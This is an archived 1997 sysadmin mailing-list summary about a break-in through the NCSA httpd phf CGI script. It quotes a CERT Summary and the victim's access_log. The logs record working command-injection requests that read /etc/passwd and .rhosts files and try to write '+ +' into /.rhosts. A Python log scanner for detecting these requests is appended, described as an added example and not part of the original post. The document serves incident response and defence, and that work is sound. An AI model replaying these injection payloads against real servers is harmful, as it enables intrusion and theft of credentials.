[S] hacker?

From: Oyanarte Portilho <portilho_at_tritium.rosat.mpe-garching.mpg.de>
Date: Fri, 3 Jan 1997 17:27:04 -0200

Dear Gurus,

Thanks to the following people who sent suggestions:

Jeff Thomas <jeff_at_WebNexus.COM>
Craig I. Hagan <hagan_at_cih.com>
Johan Mertensson <jom_at_s3.kth.se>
Gyula Szokoly <szgyula_at_arrakis.pha.jhu.edu>
Phil Edwards <pedwards_at_valhalla.cs.wright.edu>
Phil Farrell <farrell_at_pangea.Stanford.EDU>
Pat Wilson paw_at_dartmouth.edu
Steven E. Newton <snewton_at_oac.hsc.uth.tmc.edu>
Jimmy M. Ferng, ferng_at_Arizona.EDU
Juan Gallego <Little.Boss_at_physics.mcgill.ca>
Jon Mitchiner <mitchinj_at_vrinet.com>
Carlos A M dos Santos <casantos_at_cpmet.ufpel.tche.br>
Michael Jastremski mjastrem_at_thunder.temple.edu
Antonio S. Martins Jr. <shadow_at_wnet.com.br>
Max M. Ramsay <mramsay_at_chakotay.au.af.mil>
Steve VanDevender <stevev_at_hexadeSteve
Pantelis Topalis <topalis_at_konops.imbb.forth.gr>
Steve Gibbons <steve_at_wyrm.AZTech.Net>
Lance A. Brown <labrown_at_splat.niehs.nih.gov>
pobrien_at_draco.harvard.edu (Patrick O'Brien)
joe.wilson_at_digitalink.com
Jon Reeves <reeves_at_zk3.dec.com>
Santosh Krishnan x2815 <santosh_at_heplinux1.uta.edu>
Carlos Medina <cmedina_at_venus.javeriana.edu.co>
Tim Mooney <mooney_at_dogbert.cc.ndsu.NoDak.edu>
Paula <paulaw_at_ozemail.com.au>
John P. Speno <speno_at_swarthmore.edu>
David Krinsky <krinsky_at_hcs.harvard.edu>
Ray Bellis <Ray.Bellis_at_community.co.uk>
Jean-Loup.Risler_at_genetique.uvsq.fr (Jean-Loup Risler)
Bob.Fedick_at_smed.com
PETER MILNES <p_milnes_at_BANKS.NTU.EDU.AU>
Lucio Chiappetti <lucio_at_ifctr.mi.cnr.it>
J.Rawcliffe_at_ee.surrey.ac.uk
Martin J. Laubach <mjl_at_CSlab.tuwien.ac.at>
William H. Magill <magill_at_isc.upenn.edu>
John Sheehy <jes_at_grove.ufl.EDU>
Roddy McColl <roddy_at_visual-ra.swmed.edu>


The problem I posted to the list concerns a security hole
in our http daemon (NCSA, version 1.5a). See the copy of the original
message below.

Almost everyone suggested getting rid of the /cgi-bin/phf script,
which in this version allows anybody to run commands on our
machine (including getting our /etc/passwd, although this is not too
serious since we have C2 security). That script is useless and
serves only to create the problem. There was also the suggestion
to run httpd as nobody or uucp, and not as root (as we do here).

That security hole was noticed by the CERT people and a Summary
was published by them last November. I am enclosing with this
message their publication, which was sent to me by some of the
kind gurus above.

We have reinstalled the operating system just to be sure
we would not keep any important file that could have been edited
by the hacker.

Pantelis Topalis sent me a perl script that creates a fake phf
that is "... used to try to find out as much info from the person
calling the script as possible". I can send a copy to interested
people or just get it from
 
# http://www.eng.auburn.edu/users/rayh/software/phf.html
# ftp://ftp.eng.auburn.edu/pub/rayh/security/phf

******** CERT Summary *****************

CERT(sm) Summary CS-96.6
November 26, 1996

The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
     ftp://info.cert.org/pub/

Past CERT Summaries are available from
     ftp://info.cert.org/pub/cert_summaries/
----------------------------------------------------------------------------


Recent Activity
---------------

Since the September CERT Summary, we have noticed these continuing trends
in incidents reported to us.

1. cgi-bin/phf Exploits

We continue to see frequent reports of attempts to exploit the vulnerability
in the CGI example program "phf". The phf program, which is installed by
default with several implementations of httpd servers, contains a weakness
that can allow intruders to execute arbitrary commands on the server. The
most common attack involves an attempt to retrieve the httpd server's
/etc/passwd file, and sample scripts for exploiting this vulnerability in phf
have been widely posted on the Internet.

While we are encouraged to see that the majority of the recently reported
attacks have failed (because the attacked sites had already removed the phf
program), the steady reports of continuing attacks indicate that these phf
exploits are still being widely attempted.

For more information about this vulnerability, see

  ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code

For related information about protecting your password files, please see

  ftp://info.cert.org/pub/tech_tips/passwd_file_protection


2. Continuing Linux Exploits

We continue to see incidents in which Linux machines have been the victims
of root compromises. In many of these incidents, the compromised systems
were unpatched or misconfigured, and the intruders exploited well-known
vulnerabilities for which CERT advisories have been published.

If you are running Linux, we strongly urge you to keep current with all
security patches and workarounds. If your system has been root compromised,
we also recommend that you review

  ftp://info.cert.org/pub/tech_tips/root_compromise

Further, you may want to monitor the Linux newsgroups and mailing lists for
security patches and workarounds. More information can be found at

  http://bach.cis.temple.edu/linux/linux-security/


----------------------------------
What's New in the CERT FTP Archive
----------------------------------
We have made the following changes since the last CERT Summary (September 24,
1996).

* New Additions

ftp://info.cert.org/pub/cert_advisories/

    CA-96.22.bash_vuls Addresses two problems with the GNU
                                        Project's Bourne Again SHell (bash):
                                        one in yy_string_get() and one in
                                        yy_readline_get().

    CA-96.23.workman_vul Describes a vulnerability in the
                                        WorkMan compact disc-playing program
                                        that affects UNIX System V Release 4.0
                                        and derivatives and Linux systems.

    CA-96.24.sendmail.daemon.mode Addresses a vulnerability that allows
                                        intruders to gain root
                                        privileges. Includes patch and upgrade
                                        information.



ftp://info.cert.org/pub/cert_bulletins/

    VB-96.17.linux Linux Security FAQ Update from
                                        Alexander Yuriev. Includes information
                                        about a mount/umount vulnerability.

    VB-96.18.sun Addresses vulnerabilities in the libc
                                        and libnsl libraries of Solaris 2.5
                                        (SunOS 5.5) and Solaris 2.5.1
                                        (SunOS 5.5.1) from Sun Microsystems,
                                        Inc. Includes patch information.


ftp://info.cert.org/pub/latest_sw_versions/

    bash Added information on bash 1.14.7.
                                                                             
    sendmail Added information on sendmail 8.8.3.



* Updated Files

ftp://info.cert.org/pub/

    Sysadmin_Tutorial.announcement Added date of next course offering.


ftp://info.cert.org/pub/cert_advisories/

    CA-94:01.ongoing.network.monitoring.attacks
                                        Clarified introductory
                                        information. Added a pointer to the
                                        CERT tech tip on root compromises.

    CA-95:02.binmail.vulnerabilities Removed Appendices B & C, which
                                        contained outdated information. In
                                        section B, added information that
                                        mail.local is now part of
                                        sendmail. Added a pointer to sendmail.

    CA-96.09.rpc.statd Updated information from Silicon
                                        Graphics Inc.

    CA-96.20.sendmail_vul Added a pointer to CA-96.24.

    CA-96.21.tcp_syn_flooding Revised second paragraph of
                                        introduction for clarity. Added new
                                        information for Silicon Graphics
                                        Inc. (SGI), Berkeley Software Design,
                                        Inc. (BSDI), Sun Microsystems, Inc.
                                        Revised appendix information on
                                        reserved private network
                                        numbers. Added pointer to information
                                        in ftp://info.cert.org/pub/vendors.

    CA-96.22.bash_vuls Added Appendix A containing
                                        information from IBM Corporation,
                                        LINUX, and Silicon Graphics,
                                        Inc. (SGI). Removed patch for problem
                                        in yy_readline_get, as the problem
                                        described for yy_string_get is not
                                        exploitable for yy_readline_get.


ftp://info.cert.org/pub/tools/mail.local/

    README Added information that mail.local is
                                        now a part of sendmail. Added a
                                        pointer to sendmail.


ftp://info.cert.org/pub/tools/sendmail/

    sendmail.8.8.3.patch
    sendmail.8.8.3.tar.Z
    sendmail.8.8.3.tar.gz
    sendmail.8.8.3.tar.sig


ftp://info.cert.org/pub/vendors/hp/

    HP.contact_info Replaced instructions for subscribing
                                        by email with the new URLs people must
                                        use.


---------------------------------------------------------------------------
How to Contact the CERT Coordination Center

Email cert_at_cert.org

Phone +1 412-268-7090 (24-hour hotline)
                CERT personnel answer 8:30-5:00 p.m. EST
                (GMT-5)/EDT(GMT-4), and are on call for
                emergencies during other hours.

Fax +1 412-268-6989

Postal address
        CERT Coordination Center
        Software Engineering Institute
        Carnegie Mellon University
        Pittsburgh PA 15213-3890
        USA

To be added to our mailing list for CERT advisories and bulletins, send your
email address to
        cert-advisory-request_at_cert.org

CERT advisories and bulletins are posted on the USENET news group
         comp.security.announce

CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
        http://www.cert.org/
        ftp://info.cert.org/pub/

If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.

Location of CERT PGP key
         ftp://info.cert.org/pub/CERT_PGP.key

---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.

CERT is a service mark of Carnegie Mellon University.

***** ORIGINAL MESSAGE **************

I was examining the access_log file of our httpd web server and found a
strange access to our file system, apparently from a web browser at the
address xxx.xxx.xxx.xxx. It looks like a hacker sniffing our system. Does
anybody have an idea on how this could have been done and how to prevent
it? How can an external internaut run ls, w and cat commands? See below
the important lines:

xxx.xxx.xxx.xxx - - [18/Dec/1996:22:34:35 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/cat "+ +" >>%20/.rhosts HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:35:00 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/cat%20"+ +" >>%20/.rhosts HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laFR%20/ HTTP/1.0" 200 40935
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:34 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20/ HTTP/1.0" 200 492
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:57 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:57:40 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/w HTTP/1.0" 200 220
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:58:31 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/home HTTP/1.0" 200 217
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:40 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:57 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:01 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:14 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users HTTP/1.0" 200 3986
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:02:33 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxx HTTP/1.0" 200 3881
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:03:24 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxx/.rhosts HTTP/1.0" 200 133
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:05:27 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 1948
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:06:28 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 3823
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:08:19 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxx/.rhosts HTTP/1.0" 200 128
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:10:54 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200 934
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:11:36 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxxx/.rhosts HTTP/1.0" 200 443
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:13:48 -0200] "GET /cgi-bin/phf HTTP/1.0" 200 1262
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:14:23 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 9765
(null) - - [18/Dec/1996:23:17:43 -0200] "" 500 -
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:17:49 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1 HTTP/1.0" 200 444
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:18:53 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1/xxxxxxxx HTTP/1.0" 200 316
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:21:13 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx HTTP/1.0" 200 57319
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:23:38 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx/bin HTTP/1.0" 200 232
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:26:52 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxx/xxxxxx HTTP/1.0" 200 7664
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:27:37 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/Mail HTTP/1.0" 200 1559
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0" 200 194
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:37 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0" 200 1654
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:06 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%01 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:19 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:59 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%05 HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:14 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%0b HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:30 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo50c HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:54 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%0c HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:21 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%0d HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:34 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%0d HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:44 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20%0d HTTP/1.0" 200 81
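A defender's check for the pattern in the log above, added here as an example (it is not part of the original post, nor the fake-phf script Pantelis sent): it parses NCSA Common Log Format lines, URL-decodes the Qalias parameter of /cgi-bin/phf requests, and reports every request whose decoded value contains a newline, which is the command-injection signature the post and the CERT Summary describe. The sample log is constructed after the excerpt above, with the addresses anonymised the same way.

```python
import re
from urllib.parse import unquote

# Constructed sample lines, modelled on the access_log excerpt quoted in the
# original message (client addresses anonymised the same way).
SAMPLE_LOG = """\
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:26 -0200] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laFR%20/ HTTP/1.0" 200 40935
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:14:23 -0200] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 9765
(null) - - [18/Dec/1996:23:17:43 -0200] "" 500 -
10.0.0.5 - - [18/Dec/1996:23:20:00 -0200] "GET /index.html HTTP/1.0" 200 512
"""

# NCSA Common Log Format: host ident authuser [time] "request" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)$')

def parse_clf(line):
    """Parse one access_log line into a dict, or return None if malformed."""
    m = CLF_RE.match(line.rstrip("\n"))
    if not m:
        return None
    host, when, request, status, size = m.groups()
    parts = request.split(" ")
    path = parts[1] if len(parts) >= 2 else ""   # "" for the bare "" 500 line
    return {"host": host, "time": when, "path": path,
            "status": int(status), "bytes": 0 if size == "-" else int(size)}

def phf_injection(path):
    """Return the command smuggled through phf's Qalias value, else None."""
    # phf handed Qalias to a shell; an encoded newline (%0a) ends the intended
    # command, so anything after it ran as the httpd user (root, in the post).
    if not path.startswith("/cgi-bin/phf?"):
        return None
    for pair in path.split("?", 1)[1].split("&"):
        if pair.startswith("Qalias="):
            value = unquote(pair[len("Qalias="):])
            if "\n" in value:
                return value.split("\n", 1)[1]
    return None

def scan_log(text):
    """Return (host, time, command, status, bytes) for every phf injection."""
    # A 200 with a real byte count means the server returned the command's
    # output: the line is evidence of success, not merely of an attempt.
    hits = []
    for line in text.splitlines():
        rec = parse_clf(line)
        cmd = phf_injection(rec["path"]) if rec else None
        if cmd is not None:
            hits.append((rec["host"], rec["time"], cmd, rec["status"], rec["bytes"]))
    return hits
```

Running scan_log over a real access_log gives the timeline of what was executed and how much came back, which is the starting point for deciding (as the post's author did) whether a reinstall is warranted.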
Received on Sat Jan 04 1997 - 00:32:41 NZDT
